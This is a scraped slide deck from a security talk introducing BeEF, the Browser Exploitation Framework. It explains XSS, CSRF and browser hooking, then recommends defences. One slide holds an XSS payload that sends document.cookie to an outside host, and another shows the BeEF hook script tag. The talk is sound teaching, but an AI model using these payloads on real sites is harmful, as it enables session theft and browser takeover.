It’s 10pm,         do you know where         your browser is?                        Christian @xntrik Frichot            ...
2SCARY
3Cute ;)
Enhancing Lives                                     4Why are we here?
I <3 U                                     5And we lurve the Internet
>=] <3 U                                6But so do bad-guys
Online Banking                 7
Online Bank Robbery                                  8Way easier these days..
Online Communication                       9
Online Romance                 10
Online Heart Robbery                                 11Way easier.
12Sad?
13Sadder!
Browsers & Web Apps                                         14But this is what we’re talking about..
Browser                     15Browsers
Web Apps                      16Web apps
17OVERVIEW
The Ubiquitous Web             &     its Imperfect Trust           Model                           181
Malicious Actors    Do Malicious Things                          192
You already deploy              defences    (even if you don’t know it)        Let’s bolster them                         ...
Ubiquitous                                           21The Internet is pervasive and ubiquitous
22People who ‘support’ the ecosystem are multiplying
Lots of people                    Lots of browsers                                          23Lots of attack surface
!eCommerce       Commerce!                    24Why?
25Attackers don’t care, just seeing victims.
26But it’s broken
27What does this mean?
28So how is my mum meant to know that this doesn’t mean the same thing??http://www.usablesecurity.org/papers/jackson.pdf
29Yup .. a fake frame inside someone else’s site..
Domains are mixed                    30
31Traditional security models just don’t work in this new age.
Bell-LaPadula ?                  32
Same Origin Policy                                        33Closest we have?
34In the end though ..The browser will do what the server says.The server will do what the browser says
It’s Mighty (confusing)                                                         35The browser is mighty - and it’s used by...
36and it’s confusing..
So just how bad is the  bad stuff the bad      people do?                         37
38OWASP, the Open Web Application Security Project, try to categorise the top 10 riskiest websecurity weaknesses.Known as ...
Cross Site Scripting                     (XSS)                                                                            ...
Server code:1. Take ‘greeting’ parameterpage.php?greeting=<input>2. Dynamically print that out in the response<p><?php ech...
What if greeting was:<script>img=new Image();img.src=http://frichot.com/nom.php?cookie=+document.cookie;</script>         ...
Words < Picture < Moving Picture                                   42
Demo       43
44
Cross Site Request Forgery             (CSRF)                                                                             ...
46
ING Direct                                                                              47https://www.eecs.berkeley.edu/~d...
Without priorknowledge of secret or   random tokens                         48
If you were onlineperforming banking                      49
And your browserrendered content from      elsewhere                        50
They couldautomatically transact   your funds away                         51
52
GET request to Add New Contact pagePOST request to add the contactPOST request to confirm the new contactPOST request to cr...
54
Samy Wanted Friends                      55
56
This is lovely, but this is                  manual                                       57This all seems very hands on..
http://beefproject.com                                                      58Let me introduce you to BeEF....The Browser ...
59The architecture looks a little bit like this.
60Beef is currently made up of 3 main components:Core, Extensions & Moduleshttp://img4.cookinglight.com/i/2009/01/0901p40f...
61Firstly is the core..http://www.imdb.com/media/rm1627756544/tt0298814
Hooking methods    Central API            for Extensions & Modules   Filters                                Database model...
Extensions                          63Extensions
Web UI                      XSSRaysConsole                         Proxy/Requester                  EXTENSIONS Demo pages ...
65Command Moduleshttp://www.mobiinformer.com/wp-content/uploads/2010/11/big_red_button.jpg
ReconBrowser                   Persistence            COMMAND MODULESDebugging                         Network          Ho...
Hooking Browsers• XSS• Social Engineering (i.e. tiny URL, or phishing  via email)• Embedding the payload (think drive-by- ...
<script src="http://beefserver.com/hook.js"></script>                                                    68This is pretty ...
Demo       69
70
71You can defend yourself
www.OWASP.org                                 72Have LOTS of material
Multiple angles (angels?)                            73
74As a minimum ..
Your Baseline,                       Your Appetite                                        75Determine your appetite and ba...
Update Your                          Frameworks                                                                       76Us...
Monitorhttp://www.ossec.net/  http://sucuri.net/                        77
Be Preparedhttp://tiny.cc/rubygemsresponse                                  78
Want Moar?             79
Dev Lifecycle     +  Securityhttp://microsoft.com/sdl                           80
Continuous Security                      81
Brakemanhttp://brakemanscanner.org/docs/presentations/                                                 82
Twitterhttp://www.slideshare.net/xplodersuv/putting-your-robots-                   to-work-14901538                       ...
You are not alone                    84
Questions?                                          85www.asteriskinfosec.com.au@asteriskinfosec@xntrik
Upcoming SlideShare
Loading in …5
×

BeEF: The Browser Exploitation Framework

1,057 views
918 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,057
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
18
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

BeEF: The Browser Exploitation Framework

  1. 1. It’s 10pm, do you know where your browser is? Christian @xntrik Frichot 1Hi - I’m Christian ..
  2. 2. 2SCARY
  3. 3. 3Cute ;)
  4. 4. Enhancing Lives 4Why are we here?
  5. 5. I <3 U 5And we lurve the Internet
  6. 6. >=] <3 U 6But so do bad-guys
  7. 7. Online Banking 7
  8. 8. Online Bank Robbery 8Way easier these days..
  9. 9. Online Communication 9
  10. 10. Online Romance 10
  11. 11. Online Heart Robbery 11Way easier.
  12. 12. 12Sad?
  13. 13. 13Sadder!
  14. 14. Browsers & Web Apps 14But this is what we’re talking about..
  15. 15. Browser 15Browsers
  16. 16. Web Apps 16Web apps
  17. 17. 17OVERVIEW
  18. 18. The Ubiquitous Web & its Imperfect Trust Model 181
  19. 19. Malicious Actors Do Malicious Things 192
  20. 20. You already deploy defences (even if you don’t know it) Let’s bolster them 203
  21. 21. Ubiquitous 21The Internet is pervasive and ubiquitous
  22. 22. 22People who ‘support’ the ecosystem are multiplying
  23. 23. Lots of people Lots of browsers 23Lots of attack surface
  24. 24. !eCommerce Commerce! 24Why?
  25. 25. 25Attackers don’t care, just seeing victims.
  26. 26. 26But it’s broken
  27. 27. 27What does this mean?
  28. 28. 28So how is my mum meant to know that this doesn’t mean the same thing??http://www.usablesecurity.org/papers/jackson.pdf
  29. 29. 29Yup .. a fake frame inside someone else’s site..
  30. 30. Domains are mixed 30
  31. 31. 31Traditional security models just don’t work in this new age.
  32. 32. Bell-LaPadula ? 32
  33. 33. Same Origin Policy 33Closest we have?
  34. 34. 34In the end though ..The browser will do what the server says.The server will do what the browser says
  35. 35. It’s Mighty (confusing) 35The browser is mighty - and it’s used by all of us ...
  36. 36. 36and it’s confusing..
  37. 37. So just how bad is the bad stuff the bad people do? 37
  38. 38. 38OWASP, the Open Web Application Security Project, try to categorise the top 10 riskiest websecurity weaknesses.Known as the OWASP Top 10 it’s a great resource..www.owasp.org
  39. 39. Cross Site Scripting (XSS) 39In the OWASP Top 10 this comes in at number 2, and they describe it as so:“XSS flaws occur when an application includes user supplied data in a page sent to thebrowser without properly validating or escaping that content”
  40. 40. Server code:1. Take ‘greeting’ parameterpage.php?greeting=<input>2. Dynamically print that out in the response<p><?php echo $_GET[‘greeting’] ?></p> 40
  41. 41. What if greeting was:<script>img=new Image();img.src=http://frichot.com/nom.php?cookie=+document.cookie;</script> 41
  42. 42. Words < Picture < Moving Picture 42
  43. 43. Demo 43
  44. 44. 44
  45. 45. Cross Site Request Forgery (CSRF) 45CSRF comes in at number 5 in the OWASP Top 10.. described as:“Since browsers send credentials like session cookies automatically, attackers can createmalicious web pages which generate forged requests that are indistinguishable fromlegitimate ones.”
  46. 46. 46
  47. 47. ING Direct 47https://www.eecs.berkeley.edu/~daw/teaching/cs261-f11/reading/csrf.pdf 2008
  48. 48. Without priorknowledge of secret or random tokens 48
  49. 49. If you were onlineperforming banking 49
  50. 50. And your browserrendered content from elsewhere 50
  51. 51. They couldautomatically transact your funds away 51
  52. 52. 52
  53. 53. GET request to Add New Contact pagePOST request to add the contactPOST request to confirm the new contactPOST request to create payment to contactPOST request to confirm payment 53
  54. 54. 54
  55. 55. Samy Wanted Friends 55
  56. 56. 56
  57. 57. This is lovely, but this is manual 57This all seems very hands on..
  58. 58. http://beefproject.com 58Let me introduce you to BeEF....The Browser Exploitation Framework ..
  59. 59. 59The architecture looks a little bit like this.
  60. 60. 60Beef is currently made up of 3 main components:Core, Extensions & Moduleshttp://img4.cookinglight.com/i/2009/01/0901p40f-beef-patty-m.jpg?300:300
  61. 61. 61Firstly is the core..http://www.imdb.com/media/rm1627756544/tt0298814
  62. 62. Hooking methods Central API for Extensions & Modules Filters Database models CORE Primary client- Ruby extensions side JS Server-side asset handling Web servicing 62! - The Core! ! - Central API! ! - Filters! ! - Primary client-side javascript! ! - Server-side asset handling and web servicing! ! - Ruby extensions! ! - Database models! ! - Hooking methods to load and manage arbitrary extensionsand command modules
  63. 63. Extensions 63Extensions
  64. 64. Web UI XSSRaysConsole Proxy/Requester EXTENSIONS Demo pages Metasploit Event handling Browser initialisation 64
  65. 65. 65Command Moduleshttp://www.mobiinformer.com/wp-content/uploads/2010/11/big_red_button.jpg
  66. 66. ReconBrowser Persistence COMMAND MODULESDebugging Network Host Router Miscellaneous 66
  67. 67. Hooking Browsers• XSS• Social Engineering (i.e. tiny URL, or phishing via email)• Embedding the payload (think drive-by- download)• Maintaining persistence after already being hooked (think Tab BeEF Injection) 67
  68. 68. <script src="http://beefserver.com/hook.js"></script> 68This is pretty much all you need.
  69. 69. Demo 69
  70. 70. 70
  71. 71. 71You can defend yourself
  72. 72. www.OWASP.org 72Have LOTS of material
  73. 73. Multiple angles (angels?) 73
  74. 74. 74As a minimum ..
  75. 75. Your Baseline, Your Appetite 75Determine your appetite and baseline
  76. 76. Update Your Frameworks 76Use the latest versions of your framework, Rails, Django, .NET (MVC)
  77. 77. Monitorhttp://www.ossec.net/ http://sucuri.net/ 77
  78. 78. Be Preparedhttp://tiny.cc/rubygemsresponse 78
  79. 79. Want Moar? 79
  80. 80. Dev Lifecycle + Securityhttp://microsoft.com/sdl 80
  81. 81. Continuous Security 81
  82. 82. Brakemanhttp://brakemanscanner.org/docs/presentations/ 82
  83. 83. Twitterhttp://www.slideshare.net/xplodersuv/putting-your-robots- to-work-14901538 Mozilla https://air.mozilla.org/minion-automating-security-for- developers/ Facebook http://www.slideshare.net/mimeframe/ ruxcon-2012-15195589 83
  84. 84. You are not alone 84
  85. 85. Questions? 85www.asteriskinfosec.com.au@asteriskinfosec@xntrik

×